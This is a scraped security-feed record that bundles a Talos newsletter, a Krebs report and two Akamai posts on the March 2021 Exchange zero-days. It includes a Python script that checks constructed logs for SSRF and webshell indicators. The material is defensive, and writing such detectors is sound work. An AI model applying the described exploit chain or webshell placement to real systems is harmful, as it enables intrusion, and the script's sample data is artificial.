"bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-22893"], "modified": "2021-04-22T10:29:36", "id": "TALOSBLOG:0043F629DC5E8DA26934B2407F1C76CC", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/-Iuyklcv1Qc/pulse-vpn-coverage.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-30T19:31:49", "description": "[](<http://4.bp.blogspot.com/-YLRBgfX54uk/XKYbVrHlGXI/AAAAAAAAFu8/MxjUEd-3hhQTW4tZkat-cLDi8G5tVm6bgCK4BGAYYCw/s1600/threat-source.png>) \n_Newsletter compiled by Jon Munshaw._ \n \nWelcome to this week\u2019s Threat Source newsletter \u2014 the perfect place to get caught up on all things Talos from the past week. \n \nBe sure to pay close attention Tuesday for [some changes we have coming to Snort.org](<https://blog.snort.org/2020/01/area-under-construction-snort.html>). 
We\u2019ll spare you the details for now, but please bear with us if the search function isn\u2019t working correctly for you or you see anything else wonky on the site. \n \nAnd, as always, we have the [latest Threat Roundup](<https://blog.talosintelligence.com/2020/01/threat-roundup-0117-0124.html>) where we go through the top threats we saw \u2014 and blocked \u2014 over the past week. \n\n\n### Upcoming public engagements\n\n**Event: **A World of Threats: When DNS becomes the new weapon for governments at [Swiss Cyber Security Days](<https://swisscybersecuritydays.ch/en/programme-en/>)** ** \n**Location: **Forum Fribourg, Granges-Paccot, Switzerland \n**Date: **Feb. 12 - 13 \n**Speakers: **Paul Rascagn\u00e8res \n**Synopsis: **In this presentation, Paul will present two threat actors Cisco Talos has been tracking who are manipulating the DNS system. On Jan. 22, 2019, the U.S. DHS published a directive concerning this attack vector. We will present the timeline for these events and their technical details. One of the actors is behind the campaign we named \u201cSea Turtle.\u201d This actor is more advanced and more aggressive than others we\u2019ve observed in the past. They do not hesitate to directly target registrars and one registry. The talk will break down these two actors and the methodology used to target the victims. \n \n\n\n### Cyber Security Week in Review\n\n * State-sponsored actors linked to Turkey are believed to be [behind a recent wave of cyber attacks](<https://www.reuters.com/article/us-cyber-attack-hijack-exclusive/exclusive-hackers-acting-in-turkeys-interests-believed-to-be-behind-recent-cyberattacks-sources-idUSKBN1ZQ10X>) targeting governments in the Middle East and Asia. The attackers are using a technique called DNS hijacking that shows similarities to the Sea Turtle actor Cisco Talos discovered last year. 
\n * Facebook executives backed the security of its WhatsApp messaging software, saying it [could not have been at fault](<https://www.inc.com/jason-aten/facebook-says-apple-is-to-blame-for-hacking-of-jeff-bezos-phone.html>) for the hacking of Amazon CEO Jeff Bezos\u2019 phone. Reports state Bezos was sent a malicious video through WhatsApp and opened it, leading to the installation of spyware. However, Facebook laid the blame at the feet of Apple and iOS\u2019 security. \n * The Bezos incident has led to many wealthy individuals reaching out to cyber security vendors for [private assistance with security](<https://www.ft.com/content/96c79040-40ea-11ea-bdb5-169ba7be433d>). For example, one group is working on an information-sharing platform for cyber attacks targeting members of royal families across the globe. \n * Dozens of United Nations servers and user accounts were [breached during an August cyber attack](<https://www.thenewhumanitarian.org/investigation/2020/01/29/united-nations-cyber-attack>), according to new leaked reports. Staff members working in the UN\u2019s Geneva, Switzerland office were reportedly told to change their passwords but were not made aware of the breach. \n * The Japanese government [adopted a series of new policies](<https://www.infosecurity-magazine.com/news/japan-considers-emergency/>) this week designed to protect government services from a cyber attack during the upcoming Summer Olympics. A special panel called on infrastructure and public transportation services to investigate any potential vulnerabilities in their systems due to the use of internet-of-things devices, and report those flaws immediately to an administrator. \n * Cisco [launched a new security architecture platform for IoT devices](<https://securityboulevard.com/2020/01/cisco-launches-iot-security-platform/>) this week. 
Cisco Cyber Vision provides users with software and services backed by Talos\u2019 intelligence to identify threats and vulnerabilities in IoT assets in real-time. \n * Facebook [agreed to pay $550 million](<https://techcrunch.com/2020/01/29/facebook-will-pay-550-million-to-settle-class-action-lawsuit-over-privacy-violations/>) as part of a settlement of a class-action lawsuit in Illinois. The suit alleged Facebook violated a state law by using facial recognition technology to auto-tag users in photos without obtaining their consent. \n * The actor behind the Maze ransomware [dumped a large amount of victim data online](<https://arstechnica.com/information-technology/2020/01/dozens-of-companies-have-data-dumped-online-by-ransomware-ring-seeking-leverage/>) this week, including information from an Ohio community college and a grocery store chain in Michigan. Administrators of Maze\u2019s website said in a message that they were sparing recent victim Parkland, Florida, but still leaked some data to prove that they were hacked. \n * The [latest security update to iOS](<https://threatpost.com/apple-patches-ios-device-tracking/152364/>) allows users to disable a location-tracking feature used by many apps. The latest patches also fixed a critical remote code execution vulnerability in the WebKit browsing engine. \n\n \n\n\n### Notable recent security issues\n\n**Title: **[Cisco urging users to update Firepower Management Center immediately to fix severe bug](<https://www.zdnet.com/article/cisco-patch-this-critical-firewall-bug-in-firepower-management-center/>) \n**Description: **Cisco disclosed a high-severity vulnerability in its Firepower Management Center last week that could allow an attacker to bypass the usual authentication steps. The vulnerability \u2014 which was assigned a 9.8 severity score out of 10 \u2014 exists in the way Firepower handles LDAP authentication responses from an external authentication server. 
An attacker could exploit this flaw by sending a specially crafted HTTP request to the device. Users are also encouraged to turn off LDAP configuration on their devices. Cisco also disclosed seven high-severity flaws and 19 medium-severity security issues in some of its other products, including Smart Software Manager. \n**Snort SIDs: **52627 \u2013 52632, 52641 - 52646 \n** \n****Title: **[Exploitation of Citrix vulnerability spikes after POC released, patches followed](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) \n**Description: **Citrix rushed out a patch for its Application Delivery Controller (ADC) and Citrix Gateway products after proof of concept code leaked for a major vulnerability. The company first disclosed CVE-2019-19781 in December, saying a patch was forthcoming. But security researchers have noticed an uptick in exploitation attacks, forcing Citrix to move up its timeline. \n**Snort SIDs: **52620 \n\n\n### Most prevalent malware files this week\n\n**SHA 256:** [85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5](<https://www.virustotal.com/gui/file/85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5/details>) \n**MD5: **8c80dd97c37525927c1e549cb59bcbf3 \n**Typical Filename:** eternalblue-2.2.0.exe \n**Claimed Product: **N/A \n**Detection Name: **W32.85B936960F.5A5226262.auto.Talos \n \n**SHA 256: **[3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3](<https://www.virustotal.com/gui/file/3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3/details>) \n**MD5: **47b97de62ae8b2b927542aa5d7f3c858 \n**Typical Filename: **qmreportupload.exe \n**Claimed Product:** qmreportupload \n**Detection Name: **Win.Trojan.Generic::in10.talos \n \n**SHA 256: **[c0cdd2a671195915d9ffb5c9533337db935e0cc2f4d7563864ea75c21ead3f94** **](<https://www.virustotal.com/gui/file/c0cdd2a671195915d9ffb5c9533337db935e0cc2f4d7563864ea75c21ead3f94/details>) \n**MD5: **7c38a43d2ed9af80932749f6e80fea6f 
\n**Typical Filename: **xme64-520.exe \n**Claimed Product: **N/A** ** \n**Detection Name: **PUA.Win.File.Coinminer::1201 \n \n**SHA 256: **[c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f](<https://www.virustotal.com/gui/file/c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f/details>) \n**MD5:** e2ea315d9a83e7577053f52c974f6a5a \n**Typical Filename: **c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f \n**Claimed Product: **N/A \n**Detection Name:** W32.AgentWDCR:Gen.21gn.1201 \n** \n****SHA 256: **[d91abcd024d4172fadc5aa82750a18796a549207b76f624b8a9d165459379258](<https://www.virustotal.com/gui/file/d91abcd024d4172fadc5aa82750a18796a549207b76f624b8a9d165459379258/details>)** ** \n**MD5:** a917d39a8ef125300f2f38ff1d1ab0db \n**Typical Filename: **FFChromeSetters \n**Claimed Product: **N/A \n**Detection Name: **PUA.Osx.Adware.Macsearch::agent.tht.talos \n \nKeep up with all things Talos by following us on [Twitter](<https://twitter.com/talossecurity?lang=en>). [Snort](<https://twitter.com/snort?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>), [ClamAV](<https://twitter.com/clamav?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) and [Immunet](<https://twitter.com/immunet?lang=en>) also have their own accounts you can follow to keep up with their latest updates. You can also subscribe to the Beers with Talos podcast [here](<https://itunes.apple.com/us/podcast/beers-with-talos-podcast/id1236329410>) (as well as on your favorite podcast app). And, if you\u2019re not already, you can also subscribe to the weekly Threat Source newsletter [here](<https://engage2demand.cisco.com/SubscribeTalosThreatSource>). \n\n", "cvss3": {}, "published": "2020-01-30T11:00:12", "type": "talosblog", "title": "Threat Source newsletter (Jan. 
30, 2020)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-30T11:00:12", "id": "TALOSBLOG:7192A351B37E9A67C1A5DB760A14DA7E", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/VpsmXEgBYno/threat-source-newsletter-jan-30-2020.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "krebs": [{"lastseen": "2021-03-10T12:47:11", "description": "**Microsoft Corp.** today released software updates to plug four security holes that attackers have been using to plunder email communications at companies that use its **Exchange Server** products. The company says all four flaws are being actively exploited as part of a complex attack chain deployed by a previously unidentified Chinese cyber espionage group.\n\n\n\nThe software giant typically releases security updates on the second Tuesday of each month, but it occasionally deviates from that schedule when addressing active attacks that target newly identified and serious vulnerabilities in its products.\n\nThe patches released today fix security problems in **Microsoft Exchange Server 2013**, **2016** and **2019**. Microsoft said its **Exchange Online** service -- basically hosted email for businesses -- is not impacted by these flaws.\n\nMicrosoft credited researchers at Reston, Va. based [Volexity](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) for reporting the attacks. Volexity **President Steven Adair** told KrebsOnSecurity it first spotted the attacks on Jan. 6, 2021.\n\nAdair said while the exploits used by the group may have taken great skills to develop, they require little technical know-how to use and can give an attacker easy access to all of an organization's email if their vulnerable Exchange Servers are directly exposed to the Internet.\n\n"These flaws are very easy to exploit," Adair said. "You don't need any special knowledge with these exploits. 
You just show up and say 'I would like to break in and read all their email.' That's all there is to it."\n\nMicrosoft says the flaws are being used by a previously unknown Chinese espionage group that's been dubbed "**Hafnium**," which is known to launch its attacks using hosting companies based in the United States.\n\n"Hafnium primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs," Microsoft said. "HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers. Once they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA."\n\nAccording to Microsoft, Hafnium attackers have been observed combining all four zero-day flaws to target organizations running vulnerable Exchange Server products.\n\n[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) is a "server-side request forgery" (SSRF) flaw, in which a server (in this case, an on-premises Exchange Server) can be tricked into running commands that it should never have been permitted to run, such as authenticating as the Exchange server itself.\n\nThe attackers used [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) to run code of their choice under the "system" account on a targeted Exchange server. The other two zero-day flaws -- [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) -- could allow an attacker to write a file to any part of the server.\n\nAfter exploiting these vulnerabilities to gain initial access, Hafnium operators deployed web shells on the compromised server, Microsoft said. 
Web shells are essentially software backdoors that allow attackers to steal data and perform additional malicious actions that lead to further compromise.\n\nNeither Microsoft nor Volexity is aware of publicly available code that would allow other cybercriminals to exploit these Exchange vulnerabilities. But given that these attacks are in the wild now, it may only be a matter of days before exploit code is publicly available online.\n\nMicrosoft stressed that the exploits detailed today were in no way connected to the [separate SolarWinds-related attacks](<https://krebsonsecurity.com/?s=solar+winds&x=0&y=0>). "We continue to see no evidence that the actor behind SolarWinds discovered or exploited any vulnerability in Microsoft products and services," the company said.\n\nFurther reading:\n\n[Microsoft's writeup on new Hafnium nation state cyberattacks](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>)\n\n[Microsoft technical advisory on the four Exchange Server flaws](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-02T21:19:17", "type": "krebs", "title": "Microsoft: Chinese Cyberspies Used 4 Exchange Server Flaws to Plunder Emails", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": 
"PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-02T21:19:17", "id": "KREBS:65D25A653F7348C7F18FFD951447B275", "href": "https://krebsonsecurity.com/2021/03/microsoft-chinese-cyberspies-used-4-exchange-server-flaws-to-plunder-emails/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "akamaiblog": [{"lastseen": "2021-03-15T22:39:29", "description": "Co-authored by Ryan Barnett.\n\n### AppSec Protections for Microsoft Exchange CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065\n\nOn March 2, 2021, the Microsoft Security Response Center alerted its customers to [several critical security updates](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) to Microsoft Exchange Server, addressing vulnerabilities currently under attack. \n\nThe United States Computer Emergency Readiness Team Cybersecurity and Infrastructure Security Agency also issued an [alert with recommendations](<https://us-cert.cisa.gov/ncas/alerts/aa21-062a>) on how to mitigate the vulnerabilities. \n\n * [CVE-2021-26855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855>) allows an unauthenticated attacker to send arbitrary HTTP requests and authenticate as the Exchange Server. The vulnerability exploits the Exchange Control Panel (ECP) via a Server-Side Request Forgery (SSRF). 
This would also allow the attacker to gain access to mailboxes and read sensitive information.\n * [CVE-2021-26857](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26857>), [CVE-2021-26858](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26858>), and [CVE-2021-27065](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27065>) allow for remote code execution.\n * CVE-2021-26858 and CVE-2021-27065 are similar post-authentication arbitrary write file vulnerabilities in Exchange. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could write a file to any path on the server. \n\n * CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could execute arbitrary code as SYSTEM on the Exchange Server\n * To locate a possible compromise of these CVEs, we encourage you to read the [Microsoft Advisory](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>).\n\n### How Akamai Can Help \n\n\nCustomers that use Akamai Web Application Firewall solutions, Kona Site Defender and Web Application Protector, with the Automated Attack Groups engine have received an automatic update for protection. 
Akamai recommends that customers using Automated Attack Groups set all their attack groups, and in particular the Web Platform Attack Group, to Deny to block these exploitation attempts.

Kona Site Defender customers using the Kona Rule Set (KRS) should update their profile and enable the newly released rules 3000083 and 3000084 in the Total Request Score (Inbound) attack group to protect against attempts to exploit the following CVEs:

 * CVE-2021-26855, the server-side request forgery (SSRF) vulnerability
 * CVE-2021-27065, which is being used to upload webshells

**Akamai recommends that either the attack group or the individual KRS rules be put into Deny mode to protect against attempts to exploit these vulnerabilities.** Rules left in Alert mode only log the attempt; they do not stop it.

Akamai's research and intelligence teams observed that attackers were quick to automate target identification and exploitation. Several existing controls in Akamai's security portfolio detect these attempts:

 1. Web Application Firewall -- Rate Controls, the TOR IP Blocklist, and the Penalty Box are also detecting and blocking this scanning traffic
 2. Client Reputation -- the "Web Scanner" and "Web Attacker" categories are identifying many attackers searching for vulnerable targets
 3. Bot Management -- controls detect that the incoming traffic is automated or comes from anonymous proxies

If you have any questions, please reach out to Akamai Support Services or your account team.

## Global Attack Intelligence

Over the last 48 hours, on our global platform, we have observed:

 * 290,000 unique attempts to scan for and/or exploit these vulnerabilities
 * 952 unique IPs involved in these attempts
 * 731 of these IPs already identified by Akamai Client Reputation threat intelligence as known web scanners or web attackers, with a median score of 9.6 out of 10
 * 23,910 unique hosts targeted
 * 80% of attack activity targeted at the Commerce, High-Tech, Financial Services, and Manufacturing verticals
 * 90% of all attack attempts targeted at organizations in the United States, Austria, India, Canada, Germany, France and the United Kingdom
 * Assetnote and Qualys were the top two known scanners

[Figure](<https://blogs.akamai.com/Microsoftblog2.png>) **Figure**: Attack sources; the top number represents the number of requests and the bottom number represents the number of IPs

## Conclusion and Recommended Steps

We have confirmed active attempts to exploit the Microsoft Exchange/Outlook Web Access zero-day vulnerabilities.

Successful exploitation allows an unauthenticated attacker to execute arbitrary code and install webshells on vulnerable Exchange Servers, giving the attacker persistent system access, access to files and mailboxes on the server, and access to credentials stored on that system.

Mitigation and remediation can be achieved by following these steps:

 1. Akamai customers that have Exchange/Outlook Web Access protected by either Kona Site Defender using the Automated Attack Groups rule set or the Web Application Protector product have already received an automatic update to the Platform Attacks Group. Kona Site Defender customers that are using the Kona Rule Set, however, need to take steps to activate the new rules to receive protection.
 2. Customers should also deploy updates to affected Exchange Servers as recommended by Microsoft and enable the Akamai protections as recommended above. The WAF rules block exploitation traffic that passes through Akamai; they do not fix the server, and a server that was compromised before the rules were enabled stays compromised until it is cleaned.
 3. Customers should investigate for exploitation or indicators of persistence, such as webshells.
 4. Customers should remediate any identified exploitation or persistence and investigate their environment for indicators of lateral movement or further compromise.

Companies should consider implementing Zero Trust Network Access (ZTNA) to be able to weather software vulnerabilities like these. Unlike the traditional "verify, then trust" model -- in which anyone holding valid user credentials is admitted to whichever site, app, or device they request -- ZTNA dictates that users and devices are never implicitly trusted and can only access applications and data after passing a secure authentication and authorization process that does not rely solely on user credentials. You can read more about how ZTNA can protect corporate resources in the context of these Microsoft Exchange vulnerabilities in the blog post [Microsoft Exchange and Verkada Hacks: Isolate Your Apps and APIs from the Internet Cesspool](<https://blogs.akamai.com/2021/03/microsoft-exchange-and-verkada-hacks-isolate-your-apps-and-apis-from-the-internet-cesspool.html>).

Source: Akamai blog, "How Akamai Can Help You Fight the Latest Exploitation Attempts Against Microsoft Exchange", published 2021-03-15 (<https://blogs.akamai.com/2021/03/appsec-protections-for-microsoft-exchange-cve-2021-26855-cve-2021-26857-cve-2021-26858-cve-2021-2706.html>). Tagged CVEs: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065. CVSS v3.1 base score 9.8, Critical (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); CVSS v2 base score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P).

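Step 3 of the recommended steps above, investigating for exploitation or persistence, is the one a practitioner has to carry out by hand on the Exchange server itself. The Python below is an added example for this page, not code from the Akamai post, from Akamai or from Microsoft. It implements three of the indicator checks Microsoft published in its HAFNIUM guidance on 2 March 2021 (an HttpProxy log row with an empty AuthenticatedUser and an AnchorMailbox of the form `ServerInfo~*/*` for CVE-2021-26855; ECP server log entries for `Set-*VirtualDirectory` cmdlets for CVE-2021-27065; .aspx files in the directories the webshells were dropped into) and runs them over constructed log excerpts and a constructed file listing. The column subset shown for the HttpProxy log, the ECP log line layout, the default install path, and the function names (`ssrf_hits`, `vdir_write_hits`, `unexpected_aspx`, `triage`) are all assumptions; on a real server point the checks at the full log directories and at a file list from a known-good install of the same build.

```python
"""Triage three of Microsoft's published indicators for the March 2021 Exchange
zero-days over constructed sample data. Example code added for this page, not
Akamai's or Microsoft's code. Indicator definitions: Microsoft HAFNIUM guidance,
2 March 2021. The log excerpts and file listing below are constructed."""
import csv
import fnmatch
import re

# Constructed excerpt of an Exchange HttpProxy log. Real logs live under
# %PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging\HttpProxy (default install
# path assumed) and carry more columns; only the ones this check needs are shown.
HTTPPROXY_LOG = """DateTime,RequestId,ClientIpAddress,UrlStem,AuthenticatedUser,AnchorMailbox,UserAgent,HttpStatus
2021-03-03T10:12:01.123Z,e1d6a2b0-0001-4a55-9c3a-000000000001,203.0.113.10,/owa/auth/logon.aspx,,,Mozilla/5.0,200
2021-03-03T10:12:05.456Z,e1d6a2b0-0002-4a55-9c3a-000000000002,203.0.113.10,/ecp/x.js,,ServerInfo~localhost/autodiscover/autodiscover.xml,python-requests/2.25.1,200
2021-03-03T10:13:44.789Z,e1d6a2b0-0003-4a55-9c3a-000000000003,198.51.100.7,/owa/,alice@example.test,alice@example.test,Mozilla/5.0,200
"""

# Constructed excerpt of an ECP server log (...\Logging\ECP\Server); layout assumed.
ECP_SERVER_LOG = """2021-03-03T10:14:02Z,ecp,Get-Mailbox,alice@example.test
2021-03-03T10:14:09Z,ecp,Set-OabVirtualDirectory,NT AUTHORITY\\SYSTEM
2021-03-03T10:15:30Z,ecp,Get-OwaVirtualDirectory,alice@example.test
"""


def _csv_lines(text):
    """Yield CSV lines, tolerating the '#...' preamble some Exchange logs carry."""
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            yield line[len("#Fields:"):].strip()
        elif line and not line.startswith("#"):
            yield line


def ssrf_hits(httpproxy_log):
    """CVE-2021-26855 indicator: a request proxied to a back end with a ServerInfo~
    anchor that never authenticated (AuthenticatedUser empty)."""
    return [row for row in csv.DictReader(_csv_lines(httpproxy_log))
            if (row.get("AuthenticatedUser") or "") == ""
            and fnmatch.fnmatchcase(row.get("AnchorMailbox") or "", "ServerInfo~*/*")]


VDIR_WRITE = re.compile(r"Set-\w+VirtualDirectory")


def vdir_write_hits(ecp_log):
    """CVE-2021-27065 indicator: ECP log entries for Set-*VirtualDirectory, the
    cmdlet family the webshell write abused. Admins run it legitimately too, so
    each hit is a lead to correlate with who ran it and when, not proof."""
    return [line for line in ecp_log.splitlines() if VDIR_WRITE.search(line)]


# Directories the March 2021 webshells were dropped into (Microsoft's guidance).
WEBSHELL_DIRS = (
    r"C:\inetpub\wwwroot\aspnet_client",
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth",
)


def unexpected_aspx(paths, baseline):
    """.aspx files under the known drop directories that are not in `baseline`.
    `baseline` is assumed to be the file list of a known-good install of the same
    build (owa\\auth legitimately holds .aspx pages; aspnet_client should hold none)."""
    known = {b.lower() for b in baseline}
    hits = []
    for p in paths:
        low = p.lower()
        if low.endswith(".aspx") and low not in known and any(
                low.startswith(d.lower() + "\\") for d in WEBSHELL_DIRS):
            hits.append(p)
    return hits


# Constructed file listing and baseline.
SAMPLE_PATHS = [
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\logon.aspx",
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\sample1.aspx",
    r"C:\inetpub\wwwroot\aspnet_client\system_web\sample2.aspx",
    r"C:\inetpub\wwwroot\aspnet_client\system_web\4_0_30319\notes.txt",
]
BASELINE = {SAMPLE_PATHS[0]}


def triage():
    """Run all three checks and return the findings keyed by indicator."""
    return {
        "cve-2021-26855_ssrf": [(r["DateTime"], r["ClientIpAddress"], r["AnchorMailbox"])
                                for r in ssrf_hits(HTTPPROXY_LOG)],
        "cve-2021-27065_vdir_write": vdir_write_hits(ECP_SERVER_LOG),
        "unexpected_aspx": unexpected_aspx(SAMPLE_PATHS, BASELINE),
    }


if __name__ == "__main__":
    for indicator, findings in triage().items():
        print(indicator, len(findings))
        for finding in findings:
            print("   ", finding)
```

A hit on any of the three is a reason to treat the server as compromised and move to step 4 (remediation and a hunt for lateral movement), not just to patch it; the second HttpProxy row above is the shape of a successful SSRF, and an unauthenticated client that reached `/ecp/` with a `ServerInfo~` anchor has already talked to the back end.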
"description": "It's been an interesting start to March in terms of public security incidents. \n\nThis month kicked off with multiple zero-day exploits being used to attack on-premises versions of Microsoft Exchange Server. And, as if that wasn't enough, that attack was quickly followed by the news that a hacktivist \"collective\" calling itself APT-69420 claims to have breached the internal systems of the Silicon Valley firm Verkada. That particular breach has garnered widespread press coverage as the group claims to have gained access to live video feeds from more than 150,000 surveillance cameras. \n\nFor me, both of these incidents -- and the responses from the various impacted firms -- brought to mind what we as an industry have been talking about for a while: [why moats and castles belong in the past](<https://blogs.akamai.com/2017/04/why-moats-and-castles-belong-in-the-past.html>).\n\nFrom my perspective, these incidents represent yet another reason why moving to a Zero Trust security model that leverages a cloud-first approach is the future of security for the majority of us. \n\nWhy? It's pretty simple.\n\nLet's look at the Exchange remote code execution vulnerability first. \n\nMicrosoft strongly urged customers to patch on-premises systems immediately. But, as we all know, patching systems isn't always as easy or quick as it sounds, especially for IT teams that are generally overwhelmed and understaffed. As one would expect, [multiple actors continue to take advantage of unpatched systems to attack organizations with vulnerable on-premises Exchange Servers](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>).\n\n[](<https://blogs.akamai.com/Miscosoft%20Image%201.png>)\n\nAt Akamai, our threat research team rolled out signatures for our web application firewall (WAF), which can stop potentially malicious payloads targeted at vulnerable Microsoft Exchange servers. 
In other words, Akamai's WAF can block the malicious payload destined for a potentially unpatched system. Clearly, this does not replace patching in the long run, but it can buy precious time for IT teams.

If you are interested in learning more about Akamai's WAF-related Microsoft Exchange server zero-day mitigations, read [How Akamai Can Help You Fight the Latest Exploitation Attempts Against Microsoft Exchange](<https://blogs.akamai.com/2021/03/appsec-protections-for-microsoft-exchange-cve-2021-26855-cve-2021-26857-cve-2021-26858-cve-2021-2706.html>).

These incidents also raise the larger question: What should and shouldn't be exposed to the public internet?

That question takes me back to an appropriately titled Gartner report from 2016 called ["It's Time to Isolate Your Services From the Internet Cesspool"](<https://www.gartner.com/en/documents/3463617/it-s-time-to-isolate-your-services-from-the-internet-ces>) that gives some pretty clear guidance on that front. The answer is fairly simple: only expose to the internet what you absolutely have to, and for those services, make sure the appropriate security controls are in place.

That brings me to the second piece of major news, the Verkada hack.

As with most breaches, there are still a lot of open questions and conjecture, but what has emerged suggests that [exposing a Jenkins server on the public internet is quite risky](<https://arstechnica.com/information-technology/2021/03/hackers-access-security-cameras-inside-cloudflare-jails-and-hospitals/>). Combine that with the well-understood tactics, techniques, and procedures most threat actors use to obtain system access and then pivot from that initial foothold to other resources on the network, and you have a recipe for even more risk.

Either way, in both of these cases restricting access to a vulnerable Exchange or Jenkins server through some form of intelligent access control can stop threat actors from reaching those resources directly. [I am partial to Zero Trust Network Access](<https://www.akamai.com/us/en/campaign/assets/reports/gartner-2020-market-guide-for-zero-trust-network-access.jsp>) (ZTNA) approaches that limit who can send malicious payloads at the vulnerable systems. Obviously, this doesn't remove the vulnerability, but restricting access to a potentially vulnerable server through ZTNA can stop malicious actors from reaching it directly.

[Figure](<https://blogs.akamai.com/Microsoft%20Image2.png>)

If external actors can't reach a vulnerable system directly, they have to redirect their efforts to reaching it by impersonating an actual end user, which becomes increasingly difficult with contextual, adaptive, identity-aware access controls such as ZTNA reinforced with FIDO2-compliant multi-factor authentication. Combine those access controls with an inline WAF and a positive picture emerges: control who has access, and inspect traffic flows for anything malicious, even from users who have been granted access.

The bottom line: Both of these incidents highlight the need to [move to a zero trust-based security model](<https://www.akamai.com/us/en/solutions/security/zero-trust-security-model.jsp>).

If you are interested in learning more, I suggest you start with [Akamai Secure Access Service Edge](<https://www.akamai.com/sase>) and our [Enterprise Defender solution](<https://www.akamai.com/us/en/multimedia/documents/product-brief/enterprise-defender-product-brief.pdf>), which combines ZTNA, Secure Web Gateway, Web Application Firewall, and application acceleration as one simple-to-consume security service delivered at the Akamai edge.

Isn't it time to effectively isolate apps and APIs from the internet?

Source: Akamai blog, "Microsoft Exchange and Verkada Hacks: Isolate Your Apps and APIs from the Internet Cesspool", published 2021-03-15 (<https://blogs.akamai.com/2021/03/microsoft-exchange-and-verkada-hacks-isolate-your-apps-and-apis-from-the-internet-cesspool.html>). Tagged CVEs (as listed in the feed): CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-2706. CVSS v3.1 base score 9.8, Critical (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); CVSS v2 base score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P).

The past month has been a very dynamic time in the world of security for hackers and threat researchers, but it has been an extended nightmare for CSOs responsible for securing their enterprise networks.

